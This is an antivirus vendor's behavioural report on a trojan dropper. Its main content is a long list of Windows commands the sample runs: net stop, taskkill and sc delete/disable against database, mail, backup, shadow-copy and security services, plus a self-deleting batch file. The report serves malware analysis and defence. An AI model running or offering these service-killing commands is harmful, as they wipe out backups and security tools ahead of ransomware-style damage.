Trojan.MulDrop28.16927

Added to the Dr.Web virus database: 2024-09-06

Description added:

Technical Information

Malicious functions
Executes the following
  • '<SYSTEM32>\net.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeIS
  • '<SYSTEM32>\taskkill.exe' /IM Launchpad.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM licenceserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Manager.exe
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\taskkill.exe' /IM ServerNT.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\taskkill.exe' /IM SqlManagement.exe /F
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\net.exe' stop "AliyunService"
  • '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net.exe' stop MSExchangePop3
  • '<SYSTEM32>\net.exe' stop CASXMLService
  • '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net.exe' stop AutoUpdateService
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\net.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\net.exe' stop Tomcat8
  • '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net.exe' stop MSExchangeHM
  • '<SYSTEM32>\net.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\taskkill.exe' /IM U8CEServer.exe /F
  • '<SYSTEM32>\net.exe' stop TeamViewer
  • '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\taskkill.exe' /IM tomcat9.exe /F
  • '<SYSTEM32>\net.exe' stop QPCore
  • '<SYSTEM32>\net.exe' stop AdobeARMservice
  • '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net.exe' stop CASLicenceServer
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net.exe' stop CASWebServer
  • '<SYSTEM32>\net.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\net.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net.exe' stop MySQL5_OA
  • '<SYSTEM32>\net.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net.exe' stop RavTask
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net.exe' stop AngelOfDeath
  • '<SYSTEM32>\net.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net.exe' stop d_safe
  • '<SYSTEM32>\net.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net.exe' stop NFLicenceServer
  • '<SYSTEM32>\net.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net.exe' stop RavService
  • '<SYSTEM32>\net.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net.exe' stop DFServ
  • '<SYSTEM32>\taskkill.exe' /IM mpdwsvc.exe /F
  • '<SYSTEM32>\net.exe' stop OMAILREPORT
  • '<SYSTEM32>\net.exe' stop IngressMgr
  • '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net.exe' stop EvtSys
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net.exe' stop Service2
  • '<SYSTEM32>\net.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net.exe' stop ServiceMid
  • '<SYSTEM32>\net.exe' stop RapService
  • '<SYSTEM32>\net.exe' stop MSExchangeRepl
  • '<SYSTEM32>\net.exe' stop DDNSService
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net.exe' stop CASMsgSrv
  • '<SYSTEM32>\net.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeTransport
  • '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\net.exe' stop tmlisten
  • '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net.exe' stop MSExchangeUM
  • '<SYSTEM32>\net.exe' stop MySQL
  • '<SYSTEM32>\net.exe' stop AGSService
  • '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CloudService.exe
  • '<SYSTEM32>\net.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClient.exe /F
  • '<SYSTEM32>\net.exe' stop vss
  • '<SYSTEM32>\net.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\net.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\net.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net.exe' stop SQLWriter
  • '<SYSTEM32>\net.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\net.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-nt.exe /F
  • '<SYSTEM32>\net.exe' stop vmvss
  • '<SYSTEM32>\net.exe' stop "ReportServer"
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net.exe' stop U8WorkerService1
  • '<SYSTEM32>\net.exe' stop U8WorkerService2
  • '<SYSTEM32>\net.exe' stop HaoZipSvc
  • '<SYSTEM32>\taskkill.exe' /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
  • '<SYSTEM32>\net.exe' stop "memcached Server"
  • '<SYSTEM32>\net.exe' stop "TMBMServer"
  • '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net.exe' stop Apache2.4
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CatalogDataService.exe
  • '<SYSTEM32>\net.exe' stop "SQLAgent"
  • '<SYSTEM32>\net.exe' stop Realtek11nSU
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\net.exe' stop "SQLBrowser"
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\net.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\net.exe' stop MSSQL$
  • '<SYSTEM32>\net.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\net.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Agent.ConfigurationService.exe
  • '<SYSTEM32>\taskkill.exe' /IM DDSoftPwsTomcat9.exe /F
  • '<SYSTEM32>\net.exe' stop "SQLWrite"
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\taskkill.exe' /IM Tomcat7w.exe /F
  • '<SYSTEM32>\net.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\net.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.BrokerService.exe
  • '<SYSTEM32>\net.exe' stop SQLBrowser
  • '<SYSTEM32>\net.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop "MSSQL"
  • '<SYSTEM32>\net.exe' stop WebAttendServer
  • '<SYSTEM32>\taskkill.exe' /IM UFSoft.U8.OC.QuartzScheduler.exe /F
  • '<SYSTEM32>\net.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net.exe' stop mysqltransport
  • '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\taskkill.exe' /IM NFVPrint.exe /F
  • '<SYSTEM32>\net.exe' stop JWRinfoClientService
  • '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\net.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\net.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\net.exe' stop VMnetDHCP
  • '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
  • '<SYSTEM32>\net.exe' stop JWService
  • '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\net.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\net.exe' stop xenlite
  • '<SYSTEM32>\taskkill.exe' /IM ReportingServicesService.exe /F
  • '<SYSTEM32>\net.exe' stop XenSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net.exe' stop Apache2.2
  • '<SYSTEM32>\net.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net.exe' stop UIODetect
  • '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\net.exe' stop VMwareHostd
  • '<SYSTEM32>\net.exe' stop TeamViewer8
  • '<SYSTEM32>\net.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\net.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net.exe' stop DellDRLogSvc
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClientMonitor.exe /F
  • '<SYSTEM32>\net.exe' stop VMUSBArbService
  • '<SYSTEM32>\net.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop VMAuthdService
  • '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net.exe' stop UFIDAWebService
  • '<SYSTEM32>\net.exe' stop K3ClouManager
Launches a large number of processes
Modifies file system
Creates the following files
  • %TEMP%\4eda.tmp\4edb.tmp\4edc.bat
Deletes the following files
  • %TEMP%\4eda.tmp\4edb.tmp\4edc.bat
Deletes itself.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4EDA.tmp\4EDB.tmp\4EDC.bat <Full path to file>"
  • '<SYSTEM32>\sc.exe' delete SQLService
  • '<SYSTEM32>\sc.exe' delete GPSDownSvr
  • '<SYSTEM32>\sc.exe' delete CASLicenceServer
  • '<SYSTEM32>\sc.exe' delete GPSUserSvr
  • '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
  • '<SYSTEM32>\sc.exe' delete GPSDaemon
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\sc.exe' delete OracleRemExecService
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\sc.exe' delete CobianBackup10
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS
  • '<SYSTEM32>\net1.exe' stop AutoUpdateService
  • '<SYSTEM32>\sc.exe' delete vmware-converter-worker
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
  • '<SYSTEM32>\sc.exe' delete vmware-converter-server
  • '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
  • '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
  • '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\sc.exe' delete LPManager
  • '<SYSTEM32>\sc.exe' delete QQCertificateService
  • '<SYSTEM32>\net1.exe' stop CASXMLService
  • '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
  • '<SYSTEM32>\sc.exe' delete GPSStorageSvr
  • '<SYSTEM32>\sc.exe' delete GPSFtpd
  • '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
  • '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\sc.exe' delete GPSMysqld
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
  • '<SYSTEM32>\net1.exe' stop AGSService
  • '<SYSTEM32>\sc.exe' delete GPSTomcat6
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\sc.exe' delete GPSLoginSvr
  • '<SYSTEM32>\net1.exe' stop MSExchangePop3
  • '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
  • '<SYSTEM32>\sc.exe' delete GPSMediaSvr
  • '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\sc.exe' delete ErpEnvSvc
  • '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
  • '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
  • '<SYSTEM32>\net1.exe' stop "AliyunService"
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\sc.exe' delete TbossSystem
  • '<SYSTEM32>\sc.exe' delete semwebsrv
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net1.exe' stop CASWebServer
  • '<SYSTEM32>\sc.exe' delete MSSEARCH
  • '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\sc.exe' delete KuaiYunTools
  • '<SYSTEM32>\net1.exe' stop Tomcat8
  • '<SYSTEM32>\sc.exe' delete MotionBoard57
  • '<SYSTEM32>\sc.exe' delete "SQL Server Reporting Services"
  • '<SYSTEM32>\sc.exe' delete wampapache
  • '<SYSTEM32>\net1.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\sc.exe' delete MsDtsServer100
  • '<SYSTEM32>\net1.exe' stop Service2
  • '<SYSTEM32>\net1.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\sc.exe' delete NFWebServer
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net1.exe' stop JWService
  • '<SYSTEM32>\sc.exe' delete "OSP Service"
  • '<SYSTEM32>\sc.exe' delete AppFabricCachingService
  • '<SYSTEM32>\net1.exe' stop VMnetDHCP
  • '<SYSTEM32>\sc.exe' delete 360EntClientSvc
  • '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
  • '<SYSTEM32>\sc.exe' delete ADWS
  • '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
  • '<SYSTEM32>\sc.exe' delete BestSyncSvc
  • '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
  • '<SYSTEM32>\net1.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\sc.exe' config "SQLSERVERAGENT" start= disabled
  • '<SYSTEM32>\sc.exe' delete 2345PicSvc
  • '<SYSTEM32>\net1.exe' stop CASLicenceServer
  • '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
  • '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
  • '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net1.exe' stop AdobeARMservice
  • '<SYSTEM32>\sc.exe' config "MSSQLFDLauncher" start= disabled
  • '<SYSTEM32>\sc.exe' delete vmware-converter-agent
  • '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
  • '<SYSTEM32>\net1.exe' stop QPCore
  • '<SYSTEM32>\sc.exe' delete VisualSVNServer
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' delete msftesql
  • '<SYSTEM32>\net1.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\sc.exe' delete btPanel
  • '<SYSTEM32>\net1.exe' stop TeamViewer
  • '<SYSTEM32>\sc.exe' delete vsvnjobsvc
  • '<SYSTEM32>\sc.exe' delete KMSELDI
  • '<SYSTEM32>\net1.exe' stop MSExchangeHM
  • '<SYSTEM32>\net1.exe' stop RapService
  • '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
  • '<SYSTEM32>\net1.exe' stop AngelOfDeath
  • '<SYSTEM32>\sc.exe' delete U8GCService
  • '<SYSTEM32>\sc.exe' delete NscAuthService
  • '<SYSTEM32>\sc.exe' delete MASTER
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\sc.exe' delete U8EncryptService
  • '<SYSTEM32>\net1.exe' stop RavTask
  • '<SYSTEM32>\sc.exe' delete U8EISService
  • '<SYSTEM32>\sc.exe' delete FTA
  • '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\sc.exe' delete U8DispatchService
  • '<SYSTEM32>\sc.exe' delete RTCASMCU
  • '<SYSTEM32>\net1.exe' stop ClickToRunSvc
  • '<SYSTEM32>\sc.exe' delete RtcSrv
  • '<SYSTEM32>\sc.exe' delete TurboCRM70
  • '<SYSTEM32>\net1.exe' stop MySQL5_OA
  • '<SYSTEM32>\sc.exe' delete OfficeUpdateService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net1.exe' stop 360EntPGSvc
  • '<SYSTEM32>\sc.exe' delete OfficeClearCache
  • '<SYSTEM32>\sc.exe' delete asComSvc
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\sc.exe' delete U8SmsSrv
  • '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net1.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net1.exe' stop EvtSys
  • '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net1.exe' stop IngressMgr
  • '<SYSTEM32>\net1.exe' stop OMAILREPORT
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
  • '<SYSTEM32>\sc.exe' delete UTUService
  • '<SYSTEM32>\net1.exe' stop DFServ
  • '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\sc.exe' delete UFReportService
  • '<SYSTEM32>\sc.exe' delete UFAllNet
  • '<SYSTEM32>\net1.exe' stop d_safe
  • '<SYSTEM32>\sc.exe' delete U8KeyManagePool
  • '<SYSTEM32>\sc.exe' delete "U8WebPool"
  • '<SYSTEM32>\sc.exe' delete U8TaskService
  • '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\sc.exe' delete U8SLReportService
  • '<SYSTEM32>\sc.exe' delete U8SCMPool
  • '<SYSTEM32>\net1.exe' stop NFLicenceServer
  • '<SYSTEM32>\net1.exe' stop "FileZilla Server"
  • '<SYSTEM32>\sc.exe' delete "U8MPool"
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
  • '<SYSTEM32>\net1.exe' stop RavService
  • '<SYSTEM32>\sc.exe' delete "Daemon Service"
  • '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
  • '<SYSTEM32>\net1.exe' stop ServiceMid
  • '<SYSTEM32>\sc.exe' delete BackupExecManagementService
  • '<SYSTEM32>\sc.exe' delete savsvc
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
  • '<SYSTEM32>\sc.exe' delete abs_deployer
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
  • '<SYSTEM32>\net1.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\sc.exe' delete BackupExecRPCService
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
  • '<SYSTEM32>\sc.exe' delete MysoftUpdate
  • '<SYSTEM32>\sc.exe' delete bedbg
  • '<SYSTEM32>\net1.exe' stop DDNSService
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
  • '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
  • '<SYSTEM32>\net1.exe' stop MSExchangeRepl
  • '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
  • '<SYSTEM32>\sc.exe' delete edr_monitor
  • '<SYSTEM32>\sc.exe' delete TxQBService
  • '<SYSTEM32>\sc.exe' delete MDM
  • '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
  • '<SYSTEM32>\net1.exe' stop MySQL
  • '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\sc.exe' delete OpenFastAssist
  • '<SYSTEM32>\net1.exe' stop MSExchangeUM
  • '<SYSTEM32>\sc.exe' delete KICkSvr
  • '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
  • '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\sc.exe' delete EASService
  • '<SYSTEM32>\net1.exe' stop tmlisten
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
  • '<SYSTEM32>\sc.exe' delete CIS
  • '<SYSTEM32>\sc.exe' delete Serv-U
  • '<SYSTEM32>\sc.exe' delete Gailun_Downloader
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
  • '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransport
  • '<SYSTEM32>\sc.exe' delete YunService
  • '<SYSTEM32>\sc.exe' delete CloudExchangeService
  • '<SYSTEM32>\sc.exe' delete RemoteAssistService
  • '<SYSTEM32>\net1.exe' stop CASMsgSrv
  • '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\sc.exe' delete ShareBoxService
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net1.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\net1.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net1.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\net1.exe' stop JWRinfoClientService
  • '<SYSTEM32>\sc.exe' delete MCService
  • '<SYSTEM32>\sc.exe' delete VMAuthdService
  • '<SYSTEM32>\sc.exe' delete TeamViewer
  • '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
  • '<SYSTEM32>\sc.exe' delete XT800Service_Personal
  • '<SYSTEM32>\net1.exe' stop vss
  • '<SYSTEM32>\sc.exe' delete MSDTC
  • '<SYSTEM32>\net1.exe' stop "SQLAgent"
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
  • '<SYSTEM32>\sc.exe' config vss start=disabled
  • '<SYSTEM32>\sc.exe' delete UIODetect
  • '<SYSTEM32>\sc.exe' config SQLBrowser start=disabled
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
  • '<SYSTEM32>\net1.exe' stop "MSSQL"
  • '<SYSTEM32>\sc.exe' delete JhTask
  • '<SYSTEM32>\sc.exe' delete WebAttendServer
  • '<SYSTEM32>\sc.exe' delete VMTools
  • '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\sc.exe' delete OracleServiceORCL
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\sc.exe' delete VGAuthService
  • '<SYSTEM32>\sc.exe' delete "vm-agent"
  • '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
  • '<SYSTEM32>\sc.exe' delete ReportServer
  • '<SYSTEM32>\sc.exe' delete RTCIMMCU
  • '<SYSTEM32>\sc.exe' delete ftnlsv3
  • '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
  • '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
  • '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
  • '<SYSTEM32>\sc.exe' delete RtcQms
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\sc.exe' delete RTCAVMCU
  • '<SYSTEM32>\sc.exe' config SQLWriter start=disabled
  • '<SYSTEM32>\net1.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\sc.exe' delete TCPIDDAService
  • '<SYSTEM32>\sc.exe' delete RTCATS
  • '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup...
  • '<SYSTEM32>\sc.exe' delete REPLICA
  • '<SYSTEM32>\sc.exe' delete VMwareHostd
  • '<SYSTEM32>\sc.exe' delete RabbitMQ
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
  • '<SYSTEM32>\net1.exe' stop SQLWriter
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net1.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\sc.exe' delete VMUSBArbService
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
